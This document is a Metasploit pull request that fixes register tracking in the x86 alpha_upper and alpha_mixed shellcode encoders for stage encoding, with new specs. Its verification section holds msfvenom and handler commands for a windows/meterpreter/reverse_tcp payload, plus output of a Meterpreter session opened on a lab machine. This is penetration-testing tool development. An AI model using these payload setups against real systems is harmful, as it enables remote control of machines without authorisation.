### PR TITLE
Fix #4395, support stage encoding with alpha_upper and alpha_mixed

### DIFF
--- a/lib/rex/arch/x86.rb
+++ b/lib/rex/arch/x86.rb
@@ -475,7 +475,7 @@ module X86
 
       # If the register is not ESP, copy ESP
       if (dst != ESP)
-        mod_registers.concat(dst)
+        mod_registers.push(dst)
         next if badchars.index( (0x70 + dst).chr )
 
         if !(badchars.index("\x89") or badchars.index( (0xE0+dst).chr ))
@@ -507,7 +507,7 @@ module X86
         regs.delete(reg)
         next if reg == ESP
         next if badchars.index( (0x58 + reg).chr )
-        mod_registers.concat(reg)
+        mod_registers.push(reg)
 
         # Pop the value back out
         0.upto(pad / 4) { |c| out << (0x58 + reg).chr }

--- a/lib/rex/arch/x86.rb
+++ b/lib/rex/arch/x86.rb
@@ -476,13 +476,22 @@ module X86
       # If the register is not ESP, copy ESP
       if (dst != ESP)
         mod_registers.push(dst)
-        next if badchars.index( (0x70 + dst).chr )
+        if badchars.index( (0x70 + dst).chr )
+          mod_registers.pop(dst)
+          next
+        end
 
         if !(badchars.index("\x89") or badchars.index( (0xE0+dst).chr ))
           buf << "\x89" + (0xE0 + dst).chr
         else
-          next if badchars.index("\x54")
-          next if badchars.index( (0x58+dst).chr )
+          if badchars.index("\x54")
+            mod_registers.pop(dst)
+            next
+          end
+          if badchars.index( (0x58+dst).chr )
+            mod_registers.pop(dst)
+            next
+          end
           buf << "\x54" + (0x58 + dst).chr
         end
       end
@@ -519,6 +528,7 @@ module X86
         modified_registers.concat(mod_registers)
         return [out, REG_NAMES32[reg].upcase, gap]
       end
+      mod_registers.pop(dst)
     end
 
     return nil

--- a/lib/rex/encoder/alpha2/alpha_mixed.rb
+++ b/lib/rex/encoder/alpha2/alpha_mixed.rb
@@ -27,28 +27,28 @@ class AlphaMixed < Generic
     # use inc ebx as a nop here so we still pad correctly
     if offset <= 16
       nop = 'C' * offset
-      nop_regs.push(Rex::Arch::X86::EBX)
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
 
       mod = 'I' * (16 - offset) + nop + '7QZ'    # dec ecx,,, push ecx, pop edx
-      mod_regs.concat([
-        Rex::Arch::X86::ECX,
-        Rex::Arch::X86::EDX
-      ])
+      mod_regs.push(Rex::Arch::X86::ECX) unless offset == 16
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
 
       edxmod = 'J' * (17 - offset)
-      edx_regs.push(Rex::Arch::X86::EDX)
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     else
       mod = 'A' * (offset - 16)
-      mod_regs.push(Rex::Arch::X86::ECX)
+      mod_regs.push(Rex::Arch::X86::ECX) unless mod.empty?
 
       nop = 'C' * (16 - mod.length)
-      nop_regs.push(Rex::Arch::X86::EBX)
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
 
       mod << nop + '7QZ'
+      mod_regs.concat(nop_regs)
       mod_regs.push(Rex::Arch::X86::EDX)
 
       edxmod = 'B' * (17 - (offset - 16))
-      edx_regs.push(Rex::Arch::X86::EDX)
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     end
 
     regprefix = {

--- a/lib/rex/encoder/alpha2/alpha_mixed.rb
+++ b/lib/rex/encoder/alpha2/alpha_mixed.rb
@@ -27,7 +27,7 @@ class AlphaMixed < Generic
     # use inc ebx as a nop here so we still pad correctly
     if offset <= 16
       nop = 'C' * offset
-      nop_regs.concat(Rex::Arch::X86::EBX)
+      nop_regs.push(Rex::Arch::X86::EBX)
 
       mod = 'I' * (16 - offset) + nop + '7QZ'    # dec ecx,,, push ecx, pop edx
       mod_regs.concat([
@@ -36,21 +36,19 @@ class AlphaMixed < Generic
       ])
 
       edxmod = 'J' * (17 - offset)
-      edx_regs.concat(Rex::Arch::X86::EDX)
+      edx_regs.push(Rex::Arch::X86::EDX)
     else
       mod = 'A' * (offset - 16)
-      mod_regs.concat(Rex::Arch::X86::ECX)
+      mod_regs.push(Rex::Arch::X86::ECX)
 
       nop = 'C' * (16 - mod.length)
-      nop_regs.concat(Rex::Arch::X86::EBX)
+      nop_regs.push(Rex::Arch::X86::EBX)
 
       mod << nop + '7QZ'
-      mod_regs.concat([
-        Rex::Arch::X86::EDX
-      ])
+      mod_regs.push(Rex::Arch::X86::EDX)
 
       edxmod = 'B' * (17 - (offset - 16))
-      edx_regs.concat(Rex::Arch::X86::EDX)
+      edx_regs.push(Rex::Arch::X86::EDX)
     end
 
     regprefix = {
@@ -74,9 +72,9 @@ class AlphaMixed < Generic
     when 'EDX'
       mod_registers.concat(edx_regs)
       mod_registers.concat(nop_regs)
-      mod_registers.concat(Rex::Arch::X86::ECX)
+      mod_registers.push(Rex::Arch::X86::ECX)
     else
-      mod_registers.concat(Rex::Arch::X86::ECX)
+      mod_registers.push(Rex::Arch::X86::ECX)
       mod_registers.concat(mod_regs)
     end
 

--- a/lib/rex/encoder/alpha2/alpha_upper.rb
+++ b/lib/rex/encoder/alpha2/alpha_upper.rb
@@ -9,21 +9,47 @@ module Alpha2
 class AlphaUpper < Generic
   def self.default_accepted_chars ; ('B' .. 'Z').to_a + ('0' .. '9').to_a ; end
 
-  def self.gen_decoder_prefix(reg, offset)
-    if (offset > 20)
-      raise "Critical: Offset is greater than 20"
+  # Generates the decoder stub prefix
+  #
+  # @param [String] reg the register pointing to the encoded payload
+  # @param [Fixnum] offset the offset to reach the encoded payload
+  # @param [Array] modified_registers accounts the registers modified by the stub
+  # @return [String] the alpha upper decoder stub prefix
+  def self.gen_decoder_prefix(reg, offset, modified_registers = [])
+    if offset > 20
+      raise 'Critical: Offset is greater than 20'
     end
+
+    mod_registers = []
+    nop_regs = []
+    mod_regs = []
+    edx_regs = []
 
     # use inc ebx as a nop here so we still pad correctly
     if (offset <= 10)
       nop = 'C' * offset
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
+
       mod = 'I' * (10 - offset) + nop + 'QZ'    # dec ecx,,, push ecx, pop edx
+      mod_regs.push(Rex::Arch::X86::ECX) unless offset == 10
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
+
       edxmod = 'J' * (11 - offset)
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     else
       mod = 'A' * (offset - 10)
+      mod_regs.push(Rex::Arch::X86::ECX) unless mod.empty?
+
       nop = 'C' * (10 - mod.length)
+      nop_regs.push(Rex::Arch::X86::EBX) unless nop.empty?
+
       mod << nop + 'QZ'
+      mod_regs.concat(nop_regs)
+      mod_regs.push(Rex::Arch::X86::EDX)
+
       edxmod = 'B' * (11 - (offset - 10))
+      edx_regs.push(Rex::Arch::X86::EDX) unless edxmod.empty?
     end
     regprefix = {
       'EAX'   => 'PY' + mod,                        # push eax, pop ecx
@@ -33,20 +59,41 @@ class AlphaUpper < Generic
       'ESP'   => 'TY' + mod,                        # push esp, pop ecx
       'EBP'   => 'UY' + mod,                        # push ebp, pop ecx
       'ESI'   => 'VY' + mod,                        # push esi, pop ecx
-      'EDI'   => 'WY' + mod,                        # push edi, pop edi
+      'EDI'   => 'WY' + mod,                        # push edi, pop ecx
     }
 
     reg.upcase!
-    if (not regprefix.keys.include? reg)
+    unless regprefix.keys.include?(reg)
       raise ArgumentError.new("Invalid register name")
     end
-    return regprefix[reg]
 
+    case reg
+    when 'EDX'
+      mod_registers.concat(edx_regs)
+      mod_registers.concat(nop_regs)
+      mod_registers.push(Rex::Arch::X86::ECX)
+    else
+      mod_registers.push(Rex::Arch::X86::ECX)
+      mod_registers.concat(mod_regs)
+    end
+
+    mod_registers.uniq!
+    modified_registers.concat(mod_registers)
+
+    return regprefix[reg]
   end
 
-  def self.gen_decoder(reg, offset)
+  # Generates the decoder stub
+  #
+  # @param [String] reg the register pointing to the encoded payload
+  # @param [Fixnum] offset the offset to reach the encoded payload
+  # @param [Array] modified_registers accounts the registers modified by the stub
+  # @return [String] the alpha upper decoder stub
+  def self.gen_decoder(reg, offset, modified_registers = [])
+    mod_registers = []
+
     decoder =
-      gen_decoder_prefix(reg, offset) +
+      gen_decoder_prefix(reg, offset, mod_registers) +
       "V" +           # push esi
       "T" +           # push esp
       "X" +           # pop eax
@@ -72,6 +119,18 @@ class AlphaUpper < Generic
       "8AC" +         # cmp [ecx+43], al          |
       "JJ" +          # jnz * --------------------
       "I"             # first encoded char, fixes the above J
+
+    mod_registers.concat(
+      [
+        Rex::Arch::X86::ESP,
+        Rex::Arch::X86::EAX,
+        Rex::Arch::X86::ESI,
+        Rex::Arch::X86::ECX,
+        Rex::Arch::X86::EDX
+      ])
+
+    mod_registers.uniq!
+    modified_registers.concat(mod_registers)
 
     return decoder
   end

--- a/modules/encoders/x86/alpha_mixed.rb
+++ b/modules/encoders/x86/alpha_mixed.rb
@@ -54,7 +54,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
             Rex::Arch::X86::EAX
           ])
       else
-        res = Rex::Arch::X86.geteip_fpu(state.badchars)
+        res = Rex::Arch::X86.geteip_fpu(state.badchars, modified_registers)
         if (not res)
           raise EncodingError, "Unable to generate geteip code"
         end

--- a/modules/encoders/x86/alpha_mixed.rb
+++ b/modules/encoders/x86/alpha_mixed.rb
@@ -42,6 +42,17 @@ class Metasploit3 < Msf::Encoder::Alphanum
         buf = 'VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089'
         reg = 'ECX'
         off = 0
+        modified_registers.concat (
+          [
+            Rex::Arch::X86::ESP,
+            Rex::Arch::X86::EDI,
+            Rex::Arch::X86::ESI,
+            Rex::Arch::X86::EBP,
+            Rex::Arch::X86::EBX,
+            Rex::Arch::X86::EDX,
+            Rex::Arch::X86::ECX,
+            Rex::Arch::X86::EAX
+          ])
       else
         res = Rex::Arch::X86.geteip_fpu(state.badchars)
         if (not res)
@@ -53,9 +64,10 @@ class Metasploit3 < Msf::Encoder::Alphanum
       reg.upcase!
     end
 
-    stub = buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off)
+    stub = buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off, modified_registers)
 
     # Sanity check that saved_registers doesn't overlap with modified_registers
+    modified_registers.uniq!
     if (modified_registers & saved_registers).length > 0
       raise BadGenerateError
     end

--- a/modules/encoders/x86/alpha_upper.rb
+++ b/modules/encoders/x86/alpha_upper.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
   # being encoded.
   #
   def decoder_stub(state)
+    modified_registers = []
     reg = datastore['BufferRegister']
     off = (datastore['BufferOffset'] || 0).to_i
     buf = ''
@@ -44,8 +45,15 @@ class Metasploit3 < Msf::Encoder::Alphanum
         buf = 'VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816'
         reg = 'ECX'
         off = 0
+        modified_registers.concat (
+          [
+            Rex::Arch::X86::ESP,
+            Rex::Arch::X86::EDI,
+            Rex::Arch::X86::ESI,
+            Rex::Arch::X86::EAX
+          ])
       else
-        res = Rex::Arch::X86.geteip_fpu(state.badchars)
+        res = Rex::Arch::X86.geteip_fpu(state.badchars, modified_registers)
         if (not res)
           raise EncodingError, "Unable to generate geteip code"
         end
@@ -55,7 +63,15 @@ class Metasploit3 < Msf::Encoder::Alphanum
       reg.upcase!
     end
 
-    buf + Rex::Encoder::Alpha2::AlphaUpper::gen_decoder(reg, off)
+    stub = buf + Rex::Encoder::Alpha2::AlphaUpper::gen_decoder(reg, off, modified_registers)
+
+    # Sanity check that saved_registers doesn't overlap with modified_registers
+    modified_registers.uniq!
+    if (modified_registers & saved_registers).length > 0
+      raise BadGenerateError
+    end
+
+    stub
   end
 
   #
@@ -71,5 +87,15 @@ class Metasploit3 < Msf::Encoder::Alphanum
   #
   def encode_end(state)
     state.encoded += Rex::Encoder::Alpha2::AlphaUpper::add_terminator()
+  end
+
+  # Indicate that this module can preserve some registers
+  def can_preserve_registers?
+    true
+  end
+
+  # Convert the SaveRegisters to an array of x86 register constants
+  def saved_registers
+    Rex::Arch::X86.register_names_to_ids(datastore['SaveRegisters'])
   end
 end

--- a/spec/lib/rex/arch/x86_spec.rb
+++ b/spec/lib/rex/arch/x86_spec.rb
@@ -1004,12 +1004,38 @@ describe Rex::Arch::X86 do
       it "returns a register as third element" do
         expect(subject[2]).to be_an Fixnum
       end
+
+      context "when modified_registers passed" do
+        let(:modified_registers) { [] }
+        it "add modified registers" do
+          described_class.geteip_fpu(badchars, modified_registers)
+          expect(modified_registers).to_not be_empty
+        end
+
+        it "modifies 2 or 3 registers" do
+          described_class.geteip_fpu(badchars, modified_registers)
+          expect(modified_registers.length).to be_between(2, 3)
+        end
+
+        it "modifies ESP" do
+          described_class.geteip_fpu(badchars, modified_registers)
+          expect(modified_registers).to include(Rex::Arch::X86::ESP)
+        end
+      end
     end
 
     context "when too many badchars" do
       let(:badchars) { (0x00..0xff).to_a.pack("C*") }
 
       it { is_expected.to be_nil }
+
+      context "when modified_registers passed" do
+        let(:modified_registers) { [] }
+        it "doesn't add any register" do
+          described_class.geteip_fpu(badchars, modified_registers)
+          expect(modified_registers).to be_empty
+        end
+      end
     end
   end
 

--- a/spec/lib/rex/encoder/alpha2/alpha_mixed_spec.rb
+++ b/spec/lib/rex/encoder/alpha2/alpha_mixed_spec.rb
@@ -50,6 +50,180 @@ describe Rex::Encoder::Alpha2::AlphaMixed do
         expect { decoder_prefix }.to raise_error
       end
     end
+
+    context "when modified_registers is passed" do
+      context "when reg is ECX" do
+        context "when offset is 10" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 10 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 5" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 5 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 0" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 0 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "doesn't mark EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to_not include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 15" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 15 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+      end
+
+      context "when reg is EDX" do
+        context "when offset is 10" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 10 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 5" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 5 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 0" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 0 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "doesn't mark EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to_not include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 15" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 15 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+      end
+    end
   end
 
 
@@ -83,6 +257,28 @@ describe Rex::Encoder::Alpha2::AlphaMixed do
         expect { decoder }.to raise_error
       end
     end
-  end
 
+    context "when modified_registers passed" do
+      let(:modified_registers) { [] }
+      it "marks EDX as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::EDX)
+      end
+
+      it "marks ECX as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::ECX)
+      end
+
+      it "marks EAX as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::EAX)
+      end
+
+      it "marks ESP as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::ESP)
+      end
+    end
+  end
 end

--- a/spec/lib/rex/encoder/alpha2/alpha_upper_spec.rb
+++ b/spec/lib/rex/encoder/alpha2/alpha_upper_spec.rb
@@ -56,6 +56,180 @@ describe Rex::Encoder::Alpha2::AlphaUpper do
         expect { decoder_prefix }.to raise_error
       end
     end
+
+    context "when modified_registers is passed" do
+      context "when reg is ECX" do
+        context "when offset is 10" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 10 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 5" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 5 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 0" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 0 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "doesn't mark EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to_not include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 15" do
+          let(:reg) { 'ECX' }
+          let(:offset) { 15 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+      end
+
+      context "when reg is EDX" do
+        context "when offset is 10" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 10 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 5" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 5 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 0" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 0 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "doesn't mark EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to_not include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+
+        context "when offset is 15" do
+          let(:reg) { 'EDX' }
+          let(:offset) { 15 }
+          let(:modified_registers) { [] }
+
+          it "marks ECX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::ECX)
+          end
+
+          it "marks EBX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EBX)
+          end
+
+          it "marks EDX as modified" do
+            described_class.gen_decoder_prefix(reg, offset, modified_registers)
+            expect(modified_registers).to include(Rex::Arch::X86::EDX)
+          end
+        end
+      end
+    end
   end
 
 
@@ -87,6 +261,34 @@ describe Rex::Encoder::Alpha2::AlphaUpper do
 
       it "raises an error" do
         expect { decoder }.to raise_error
+      end
+    end
+
+    context "when modified_registers passed" do
+      let(:modified_registers) { [] }
+      it "marks EDX as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::EDX)
+      end
+
+      it "marks ECX as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::ECX)
+      end
+
+      it "marks ESI as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::ESI)
+      end
+
+      it "marks EAX as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::EAX)
+      end
+
+      it "marks ESP as modified" do
+        described_class.gen_decoder(reg, offset, modified_registers)
+        expect(modified_registers).to include(Rex::Arch::X86::ESP)
       end
     end
   end


### PR DESCRIPTION
As @rsmudge pointed, when Stage encoding was modified to be SaveRegister aware the x86/alpha_upper and x86/alpha_mixed encoders weren't update to support such feature. Even when it's possible to use them under certain conditions.

This pull requests allows both encoders to account the registers modified so it can be use for Stage encoding again.

**Important Note:**  When testing, the encoder stub could modify the register used to share the socket between the stager and the stage. In this case the alpha encoders won't be used and the stage won't be encoded. It is **expected** and indeed allows to not waste things when the alpha encoders decide to use any of the registers marked to be saved. Alpha encoders could be improved but it's out of the scope of this PR.

**Important Note 2:** When using the alpha encoders for the stages, which are big pieces of data it takes some time to encode them:
- alpha_upper: [*] Time ellapsed: 34.397357
- alpha_mixed: [*] Time ellapsed: 57.148355

Again, it is expected, and not due to these changes.
## VERIFICATION
- [x] Generate a windows/meterpreter/reverse_tcp stager inside an EXE  with msfvenom and upload it to your x86 windows target.
- [x] Run msfconsole
- [x] Run a resource like this one to configure the handler to encode the stage with alpha_upper

```
setg LogLevel 5
use exploit/multi/handler
set VERBOSE true
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.158.1
set LPORT 4444
set EnableStageEncoding true
set StageEncoder x86/alpha_upper
exploit
```

```
msf exploit(handler) > resource /Users/jvazquez/tmp/registers_alpha_upper.rc
[*] Processing /Users/jvazquez/tmp/registers_alpha_upper.rc for ERB directives.
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> setg LogLevel 5
LogLevel => 5
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> use exploit/multi/handler
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> set VERBOSE true
VERBOSE => true
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> set LHOST 172.16.158.1
LHOST => 172.16.158.1
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> set LPORT 4444
LPORT => 4444
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> set StageEncoder x86/alpha_upper
StageEncoder => x86/alpha_upper
resource (/Users/jvazquez/tmp/registers_alpha_upper.rc)> exploit

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
```
- [x] Execute the exe on the target, **VERIFY** which the stage is encoded with alpha_upper and you get an usable session:

```
[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Encoded stage with x86/alpha_upper
[*] Sending encoded stage (1768608 bytes) to 172.16.158.133
[*] Meterpreter session 3 opened (172.16.158.1:4444 -> 172.16.158.133:1044) at 2015-06-08 16:11:46 -0500

meterpreter > getuid
Server username: JUAN-C0DE875735\Administrator
meterpreter > exit
```

On the logs you should see:

```
[06/08/2015 16:11:44] [i(0)] core: windows/meterpreter/reverse_tcp: iteration 1: Successfully encoded with encoder x86/alpha_upper (size is 1768608)
```
- [x] Run a resource like this one to configure the handler to encode the stage with alpha_mixed

```
setg LogLevel 5
use exploit/multi/handler
set VERBOSE true
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 172.16.158.1
set LPORT 4444
set EnableStageEncoding true
set StageEncoder x86/alpha_mixed
exploit
```

```
msf exploit(handler) > resource /Users/jvazquez/tmp/registers.rc
[*] Processing /Users/jvazquez/tmp/registers.rc for ERB directives.
resource (/Users/jvazquez/tmp/registers.rc)> setg LogLevel 5
LogLevel => 5
resource (/Users/jvazquez/tmp/registers.rc)> use exploit/multi/handler
resource (/Users/jvazquez/tmp/registers.rc)> set VERBOSE true
VERBOSE => true
resource (/Users/jvazquez/tmp/registers.rc)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/Users/jvazquez/tmp/registers.rc)> set LHOST 172.16.158.1
LHOST => 172.16.158.1
resource (/Users/jvazquez/tmp/registers.rc)> set LPORT 4444
LPORT => 4444
